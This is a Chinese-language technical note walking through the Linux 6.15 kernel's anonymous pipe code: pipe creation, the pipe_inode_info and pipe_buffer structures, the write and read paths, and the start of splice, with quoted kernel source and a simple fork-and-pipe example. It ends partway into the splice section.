# Linux Kernel - analyze pipe
> Author: 堇姬 Naup
## pipe
是一種 IPC 的方法
pipe 是用於不同 process 之間通訊的一個東西
可以通過 syscall pipe 來去使用
https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md


這兩著最終都會 call 到 `do_pipe2`,不過 pipe2 可以添加 flags
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1051
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}
SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
```
他會去 call `__do_pipe_flags`
之後將從 `__do_pipe_flags` 分配的 files 跟 fd 綁並再一起作為讀端和寫端
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1029
/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;
error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}
```
他會傳入兩個 file struct 並通過 `create_pipe_file` 來去創建
會建立 pipe 的內部結構(pipe_inode_info)、建立兩個 struct file 並設定它們的 f_op
並且 `get_unused_fd_flags` 來去找尚未使用的 fd 並回傳
之後去將他給 fd 作為讀端寫端 fd
`audit_fd_pair` 實際上會 call `__audit_fd_pair`
來去建立 `audit_context` 一對 pair fd
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L976
static int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;
error = create_pipe_files(files, flags);
if (error)
return error;
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_read_pipe;
fdr = error;
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_fdr;
fdw = error;
audit_fd_pair(fdr, fdw);
fd[0] = fdr;
fd[1] = fdw;
/* pipe groks IOCB_NOWAIT */
files[0]->f_mode |= FMODE_NOWAIT;
files[1]->f_mode |= FMODE_NOWAIT;
return 0;
err_fdr:
put_unused_fd(fdr);
err_read_pipe:
fput(files[0]);
fput(files[1]);
return error;
}
```
`create_pipe_files` 建立了很多東西
首先是 pipe inode 之後去建立 `struct pipe_inode_info` (作為 pipe metadata 描述整個 pipe 狀態) 並關聯 (主要是把 pipe_inode_info 的 pointer 以及 ops 給他,詳細可以看 code,這邊不太重要)
之後去 `alloc_file_pseudo` 建立了一個 write only 的 file
以及之後去 clone 一個 readonly 的 file
兩個都去指向 `inode` (這兩個就是上面說的作為讀端跟寫端的 fd)
```c
int fd[2];
pipe(fd); // fd[0] = read end, fd[1] = write end
```
也是 call pipe 會回傳的
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L925
int create_pipe_files(struct file **res, int flags)
{
struct inode *inode = get_pipe_inode();
struct file *f;
int error;
if (!inode)
return -ENFILE;
if (flags & O_NOTIFICATION_PIPE) {
error = watch_queue_init(inode->i_pipe);
if (error) {
free_pipe_info(inode->i_pipe);
iput(inode);
return error;
}
}
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipeanon_fops);
if (IS_ERR(f)) {
free_pipe_info(inode->i_pipe);
iput(inode);
return PTR_ERR(f);
}
f->private_data = inode->i_pipe;
f->f_pipe = 0;
res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
&pipeanon_fops);
if (IS_ERR(res[0])) {
put_pipe_info(inode, inode->i_pipe);
fput(f);
return PTR_ERR(res[0]);
}
res[0]->private_data = inode->i_pipe;
res[0]->f_pipe = 0;
res[1] = f;
stream_open(inode, res[0]);
stream_open(inode, res[1]);
/*
* Disable permission and pre-content events, but enable legacy
* inotify events for legacy users.
*/
file_set_fsnotify_mode(res[0], FMODE_NONOTIFY_PERM);
file_set_fsnotify_mode(res[1], FMODE_NONOTIFY_PERM);
return 0;
}
```
`get_pipe_inode` 實現了分配 inode ([struct source](https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/fs.h#L672)) 並初始化
包括 `i_pipe` 指向 `pipe_inode_info`
或是給 fops
並給予 fuid fgid 等
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L885
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;
if (!inode)
goto fail_inode;
inode->i_ino = get_next_ino();
pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;
inode->i_pipe = pipe;
pipe->files = 2;
pipe->readers = pipe->writers = 1;
inode->i_fop = &pipeanon_fops;
/*
* Mark the inode dirty from the very beginning,
* that way it will never be moved to the dirty
* list because "mark_inode_dirty()" will think
* that it already _is_ on the dirty list.
*/
inode->i_state = I_DIRTY;
inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
simple_inode_init_ts(inode);
return inode;
fail_iput:
iput(inode);
fail_inode:
return NULL;
}
```
最後來看看剛剛說的 `struct pipe_inode_info`
作為描述 pipe 的 metadata
有很多資訊存放在上面
- head: 下一個寫入位置
- tail: 下一個讀取位置
- rd_wait / wr_wait
- 當 pipe 為空時,讀端進入 rd_wait 等待
- 當 pipe 為滿時,寫端進入 wr_wait 等待
- max_usage: ring buffer 可使用的最大 buffer 數
- readers / writers: 當前活躍的讀端與寫端數量
- files: 有多少個 struct file 引用這個 pipe(受 ->i_lock 保護)
- r_counter / w_counter: 計數器,追蹤端點操作,主要用於判斷狀態變化與喚醒邏輯
- poll_usage: 表示此 pipe 是否用於 epoll(因為 epoll 會造成更頻繁的 wakeup,需要特殊處理)
- tmp_page: 暫存釋放掉的 page
- bufs: 指向真正的 ring buffer
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L86
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @head_tail: unsigned long union of @head and @tail
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @poll_usage: is this pipe used for epoll, which has crazy wakeups?
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
/* This has to match the 'union pipe_index' above */
union {
unsigned long head_tail;
struct {
pipe_index_t head;
pipe_index_t tail;
};
};
unsigned int max_usage;
unsigned int ring_size;
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
bool poll_usage;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
struct page *tmp_page[2];
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};
```
分配 `pipe_inode_info` 的地方在 `alloc_pipe_info`
他會先分配一個 `pipe_inode_info`
之後去建立 0x10 `pipe_buffer` array
以及將 pipe 資訊都填入到 `pipe_inode_info`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L791
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS; // #define PIPE_DEF_BUFFERS 16
struct user_struct *user = get_current_user();
unsigned long user_bufs;
// static unsigned int pipe_max_size = 1048576; (0x100000)
unsigned int max_size = READ_ONCE(pipe_max_size); \
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;
user_bufs = account_pipe_buffers(user, 0, pipe_bufs);
...
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
lock_set_cmp_fn(&pipe->mutex, pipe_lock_cmp_fn, NULL);
return pipe;
}
...
return NULL;
}
```
接下來看一下 `pipe_buffer`
pipe_buffer 就是用來存資料的地方,每個 pipe 管理了一些 page 來存想通過 pipe 傳輸的 data
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L17
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
```
最終可以看全圖

接下來可以看如何去操作 pipe
可以找到這張 vtable (就是放在 inode 的 `i_fop` 指向的 pipeanon_fops)
PS: 一個是給匿名一個是個命名
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1243
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.read_iter = fifo_pipe_read,
.write_iter = fifo_pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
static const struct file_operations pipeanon_fops = {
.open = fifo_open,
.read_iter = anon_pipe_read,
.write_iter = anon_pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
```
可以去對 pipe 做 read write 等操作
這部分因為我是看 6.15 版本的 kernel
他將 pipe ops function 變成這樣 (這部分應該是針對匿名管道效率做出的優化)
https://git.sceen.net/linux/linux-stable.git/commit/?id=71ee2fde57c707ac8f221321f3e951288f00f04b
- anon_pipe_write: 將 data 寫入到 pipe_buffer 上
- anon_pipe_read: 將 data 從 pipe_buffer 讀出來
- splice: 在兩個檔案描述符之間搬資料時,盡量做到零拷貝
## anon_pipe_write
當我們從 pipe fd 做寫入 (就是要寫進 pipe_buffer),在匿名管道會 call 到這個 `anon_pipe_write`
當我們去 call `write` 的時候
會去 call
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L744
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
return ksys_write(fd, buf, count);
}
```
之後去 call 到 `ksys_write`
如果 f.file 存在,透過 file_ppos 找到在檔案中的位置,其位置位於 f_pos 欄位,回傳到指標 *ppos
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L725
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
CLASS(fd_pos, f)(fd); // 應該是 fd 轉 struct file
ssize_t ret = -EBADF;
if (!fd_empty(f)) {
loff_t pos, *ppos = file_ppos(fd_file(f)); // 當前的讀寫位置
if (ppos) {
pos = *ppos;
ppos = &pos;
}
ret = vfs_write(fd_file(f), buf, count, ppos);
if (ret >= 0 && ppos)
fd_file(f)->f_pos = pos;
}
return ret;
}
#define CLASS(_name, var) \
class_##_name##_t var __cleanup(class_##_name##_destructor) = \
class_##_name##_constructor
#define fd_file(f) ((struct file *)((f).word & ~(FDPUT_FPUT|FDPUT_POS_UNLOCK)))
static inline bool fd_empty(struct fd f)
{
return unlikely(!f.word);
}
/* file_ppos returns &file->f_pos or NULL if file is stream */
static inline loff_t *file_ppos(struct file *file)
{
return file->f_mode & FMODE_STREAM ? NULL : &file->f_pos;
}
```
之後去 call `vfs_write`
VFS 定義了在實體檔案系統上更高一層的介面,讓應用程式得以透過VFS 定義好的介面存取底層資料,不用考慮底層是如何實作
https://students.mimuw.edu.pl/ZSO/Wyklady/08_VFS1/VFS-1.pdf
* file: 指向欲寫入的檔案結構 (struct file)
* buf: 指向使用者空間的資料緩衝區
* count: 欲寫入的資料長度(bytes)
* pos: 指向檔案寫入位置的指標(offset)
vfs_write 是 Linux VFS 層統一的寫入介面,包含:
* 權限和參數合法性檢查 (檔案)
* 位置與大小驗證
* 呼叫檔案系統特定的寫入函式
* 寫入後通知檔案系統事件
* 鎖定及統計管理
是連接 syscall write() 與底層檔案系統實際寫入的函式
這部分其他先不管,他會根據你傳入的 file 的 vtable 去找 write,最後就會 call 到目標
`vfs_write` → `new_sync_write` → `filp->f_op->write_iter(&kiocb, &iter)` → `anon_pipe_write()`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L664
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE))
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;
ret = rw_verify_area(WRITE, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
file_start_write(file);
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
return ret;
}
```
這部分是在串接 kiocb、iter 等
這邊簡單理解
kiocb 內含檔案、寫入位置、狀態等各種 Linux I/O 相關
iov_iter 告訴 kernel 從哪裡拿資料
```c
static ssize_t new_sync_write(struct file *filp, const char __user *buf, size_t len, loff_t *ppos)
{
struct kiocb kiocb;
struct iov_iter iter;
ssize_t ret;
init_sync_kiocb(&kiocb, filp);
kiocb.ki_pos = (ppos ? *ppos : 0);
iov_iter_ubuf(&iter, ITER_SOURCE, (void __user *)buf, len);
ret = filp->f_op->write_iter(&kiocb, &iter);
BUG_ON(ret == -EIOCBQUEUED);
if (ret > 0 && ppos)
*ppos = kiocb.ki_pos;
return ret;
}
```
接下來進入重點,匿名 pipe 的寫入行為
首先是一些初始化
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L431
static ssize_t
anon_pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
```
這部分在試圖去合併到當前存在的尾部
若當前的 pipe 不是 empty 且小於一個 page
之後檢查是否合併後會大於一個 page 跟那個 pipe_buffer (當前 head - 1) 是否有開啟 `PIPE_BUF_FLAG_CAN_MERGE`
更新 offset 到沒使用到的地方
之後去將東西 copy 到對應 page 上
```c
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
struct pipe_buffer *buf = pipe_buf(pipe, head - 1);
int offset = buf->offset + buf->len;
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
```
這是個主迴圈
首先會先檢查 pipe 一些資訊,以及當前 pipe 有沒有 full 狀態
若可以寫入,就去拿一塊 page 來用
`anon_pipe_get_page` 封裝了有關 alloc page 跟拿 tmp 的邏輯
不過總之你會拿到一塊 page 用來作為 pipe_buffer 存放資料的地方
之後用 copy_page_from_iter() 去 copy
copy 完後
前移 head,並將去設置好 pipe_buffer 內容 (包含剛剛寫入的 page)
並設置該 buffer 的 offset 為 0(從 0 開始 copy)
buffer len 設置成 copy 的長度
之後去根據 packetized 設置情況,來去設置 flags
代表該 page 後續是否可以被合併
```c
for (;;) {
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
struct pipe_buffer *buf;
struct page *page;
int copied;
page = anon_pipe_get_page(pipe);
if (unlikely(!page)) {
if (!ret)
ret = -ENOMEM;
break;
}
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
anon_pipe_put_page(pipe, page);
if (!ret)
ret = -EFAULT;
break;
}
pipe->head = head + 1;
/* Insert it into the buffer array */
buf = pipe_buf(pipe, head);
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
buf->len = copied;
ret += copied;
if (!iov_iter_count(from))
break;
continue;
}
/* Wait for buffer space to become available. */
if ((filp->f_flags & O_NONBLOCK) ||
(iocb->ki_flags & IOCB_NOWAIT)) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
/*
* We're going to release the pipe lock and wait for more
* space. We wake up any readers if necessary, and then
* after waiting we need to re-check whether the pipe
* become empty while we dropped the lock.
*/
mutex_unlock(&pipe->mutex);
if (was_empty)
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
mutex_lock(&pipe->mutex);
was_empty = pipe_is_empty(pipe);
wake_next_writer = true;
}
```
整體寫入邏輯大概是這樣
這邊想細講一下 `copy_page_from_iter`
他會傳入想 copy 的 page pointer 跟起始 offset,跟想寫進去多少 bytes 以及 iter
- page_copy_sane 用來檢查傳入的 offset、bytes 是否合法合理
- 之後去 `kmap_local_page` 來將 page 映射到 kernel virtual address 來去操作他並計算本次從該頁可複製的最大位元組數
- 之後 copy 後去 `kunmap_local` 取消映射
```c
size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
size_t res = 0;
if (!page_copy_sane(page, offset, bytes))
return 0;
page += offset / PAGE_SIZE; // first subpage
offset %= PAGE_SIZE;
while (1) {
void *kaddr = kmap_local_page(page);
size_t n = min(bytes, (size_t)PAGE_SIZE - offset);
n = _copy_from_iter(kaddr + offset, n, i);
kunmap_local(kaddr);
res += n;
bytes -= n;
if (!bytes || !n)
break;
offset += n;
if (offset == PAGE_SIZE) {
page++;
offset = 0;
}
}
return res;
}
EXPORT_SYMBOL(copy_page_from_iter);
```
使用他大概就像這樣
通過 `pipe` 建立
之後去創建一個子進程
子進程因為 read 堵塞 (沒東西),會去等待 pipe
等到父進程寫入資料到 pipe
之後去讀取
```c
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
int main() {
int pipefd[2];
pid_t cpid;
char buf[100];
if (pipe(pipefd) == -1) {
perror("pipe");
exit(EXIT_FAILURE);
}
cpid = fork();
if (cpid == -1) {
perror("fork");
exit(EXIT_FAILURE);
}
if (cpid == 0) {
close(pipefd[1]);
ssize_t n = read(pipefd[0], buf, sizeof(buf) - 1);
if (n > 0) {
buf[n] = '\0';
printf("Child read from pipe: %s\n", buf);
}
close(pipefd[0]);
exit(EXIT_SUCCESS);
} else {
close(pipefd[0]);
const char *msg = "Hello, pipe!";
write(pipefd[1], msg, strlen(msg));
close(pipefd[1]);
wait(NULL);
exit(EXIT_SUCCESS);
}
}
```
## anon_pipe_read
前面的部分跟 write 很像
通過 syscall 調用到 `ksys_read`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L720
SYSCALL_DEFINE3(read, unsigned int, fd, char __user *, buf, size_t, count)
{
return ksys_read(fd, buf, count);
}
```
一樣的流程處理 fd 跟 buf
之後 call `vfs_read`
```c
ssize_t ksys_read(unsigned int fd, char __user *buf, size_t count)
{
CLASS(fd_pos, f)(fd);
ssize_t ret = -EBADF;
if (!fd_empty(f)) {
loff_t pos, *ppos = file_ppos(fd_file(f));
if (ppos) {
pos = *ppos;
ppos = &pos;
}
ret = vfs_read(fd_file(f), buf, count, ppos);
if (ret >= 0 && ppos)
fd_file(f)->f_pos = pos;
}
return ret;
}
```
一樣去做了相當多檢查
並且去 call `new_sync_read`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L550
ssize_t vfs_read(struct file *file, char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;
if (!(file->f_mode & FMODE_READ))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_READ))
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;
ret = rw_verify_area(READ, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
if (file->f_op->read)
ret = file->f_op->read(file, buf, count, pos);
else if (file->f_op->read_iter)
ret = new_sync_read(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_access(file);
add_rchar(current, ret);
}
inc_syscr(current);
return ret;
}
```
將 kiobc 跟 iter 初始化後
去 call `filp->f_op->read_iter` 根據 vtable 實際上調用到
`anon_pipe_read`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L479
static ssize_t new_sync_read(struct file *filp, char __user *buf, size_t len, loff_t *ppos)
{
struct kiocb kiocb;
struct iov_iter iter;
ssize_t ret;
init_sync_kiocb(&kiocb, filp);
kiocb.ki_pos = (ppos ? *ppos : 0);
iov_iter_ubuf(&iter, ITER_DEST, buf, len);
ret = filp->f_op->read_iter(&kiocb, &iter);
BUG_ON(ret == -EIOCBQUEUED);
if (ppos)
*ppos = kiocb.ki_pos;
return ret;
}
```
一開始初始化了一些變數
* iocb:裡面有目前文件指標(filp)
* to:讀資料要寫入的 iov_iter
* total_len:本次預計要讀的字節數
* pipe:匿名管道的資料結構
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L270
static ssize_t
anon_pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool wake_writer = false, wake_next_reader = false;
ssize_t ret;
/* Null read succeeds. */
if (unlikely(total_len == 0))
return 0;
ret = 0;
mutex_lock(&pipe->mutex);
```
之後是主迴圈
- smp_load_acquire 讀取 head,以及讀取 tail (head: 下一個寫入 pipe_buffer 位置、tail: 下一個讀取 pipe_buffer 位置)
- CONFIG_WATCH_QUEUE 分支我們先不管
- 檢查 pipe 不等於 empty
- 從 tail 讀入要讀取的 page
- 之後去 `copy_page_to_iter` copy 到 iter (buf) (若複製少於預期,返回錯誤)
- 將 offset 下推更新已經讀取範圍,以及 len 去扣掉 chars
- 最後去更新 tail
```c
/*
* We only wake up writers if the pipe was full when we started reading
* and it is no longer full after reading to avoid unnecessary wakeups.
*
* But when we do wake up writers, we do so using a sync wakeup
* (WF_SYNC), because we want them to get going and generate more
* data for us.
*/
for (;;) {
/* Read ->head with a barrier vs post_one_notification() */
unsigned int head = smp_load_acquire(&pipe->head);
unsigned int tail = pipe->tail;
#ifdef CONFIG_WATCH_QUEUE
if (pipe->note_loss) {
struct watch_notification n;
if (total_len < 8) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
n.type = WATCH_TYPE_META;
n.subtype = WATCH_META_LOSS_NOTIFICATION;
n.info = watch_sizeof(n);
if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
if (ret == 0)
ret = -EFAULT;
break;
}
ret += sizeof(n);
total_len -= sizeof(n);
pipe->note_loss = false;
}
#endif
if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = pipe_buf(pipe, tail);
size_t chars = buf->len;
size_t written;
int error;
if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}
error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;
/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}
if (!buf->len) {
wake_writer |= pipe_full(head, tail, pipe->max_usage);
tail = pipe_update_tail(pipe, buf, tail);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
if (!pipe->writers)
break;
if (ret)
break;
if ((filp->f_flags & O_NONBLOCK) ||
(iocb->ki_flags & IOCB_NOWAIT)) {
ret = -EAGAIN;
break;
}
mutex_unlock(&pipe->mutex);
/*
* We only get here if we didn't actually read anything.
*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;
wake_next_reader = true;
mutex_lock(&pipe->mutex);
}
```
更新 tail 邏輯如下
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L239
static inline unsigned int pipe_update_tail(struct pipe_inode_info *pipe,
struct pipe_buffer *buf,
unsigned int tail)
{
pipe_buf_release(pipe, buf);
/*
* If the pipe has a watch_queue, we need additional protection
* by the spinlock because notifications get posted with only
* this spinlock, no mutex
*/
if (pipe_has_watch_queue(pipe)) {
spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
if (buf->flags & PIPE_BUF_FLAG_LOSS)
pipe->note_loss = true;
#endif
pipe->tail = ++tail;
spin_unlock_irq(&pipe->rd_wait.lock);
return tail;
}
/*
* Without a watch_queue, we can simply increment the tail
* without the spinlock - the mutex is enough.
*/
pipe->tail = ++tail;
return tail;
}
```
以上就是 read pipe 到 buffer 上的 call 法
## release
## splice
先來看看文檔怎麼用
https://man7.org/linux/man-pages/man2/splice.2.html
```c
ssize_t splice(int fd_in, off_t *_Nullable off_in,
int fd_out, off_t *_Nullable off_out,
size_t size, unsigned int flags);
```
* fd_in:輸入的檔案描述符
* off_in:輸入檔案偏移量指標(可能是 NULL)
* fd_out:輸出的檔案描述符
* off_out:輸出檔案偏移量指標(可能是 NULL)
* len:要搬運的位元組數
* flags:SPLICE_F_* 選項
splice() 用來在兩個 file descriptor 之間移動資料,不經過 user space 與核心空間 kernel space 的資料複製
效率比 read() + write() 高
它最多會傳輸 size 個位元組,其中至少有一個 fd 必須是 pipe
fd_in 與 off_in 規則
* 如果 fd_in 是 pipe → off_in 必須是 NULL
* 如果 fd_in 不是 pipe 且 off_in == NULL → 從當前檔案偏移量讀取,並自動更新該檔案偏移量
* 如果 fd_in 不是 pipe 且 off_in != NULL → 從 \*off_in 指定的偏移量讀取,不會影響檔案本身的偏移量,但會更新 \*off_in
fd_out / off_out 規則與 fd_in / off_in 的規則類似
flags 直接去看文檔
額外參考: https://www.kernel.org/doc/html/v6.15/filesystems/splice.html
根據上述,共會有四種狀況
- pipe2pipe
- pipe2file
- file2pipe
以下是 kernel source code
當呼叫 splice 會去掉用到 syscall
做了些 flags len 檢查,然後用 `CLASS` macro 找到 fd 的 file pointer 後
就去 call `__do_splice`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1615
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
{
if (unlikely(!len))
return 0;
if (unlikely(flags & ~SPLICE_F_ALL))
return -EINVAL;
CLASS(fd, in)(fd_in);
if (fd_empty(in))
return -EBADF;
CLASS(fd, out)(fd_out);
if (fd_empty(out))
return -EBADF;
return __do_splice(fd_file(in), off_in, fd_file(out), off_out,
len, flags);
}
```
首先初始化以下變數
* ipipe / opipe:指向輸入(in)/輸出(out)的 pipe kernel 結構,如果該 fd 不是 pipe,會是 NULL
* offset:臨時存放 offset
* \__off_in / \__off_out:指向 kernel 中的 offset 變數,如果使用者傳了 offset 參數,就用它們
之後通過 `get_pipe_info` 去讀取看看該 fd 是不是 pipe
讀完後檢查是 pipe 的其 offset 並非 null
之後從 userspace copy offset
最後 call `do_splice`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1396
static ssize_t __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
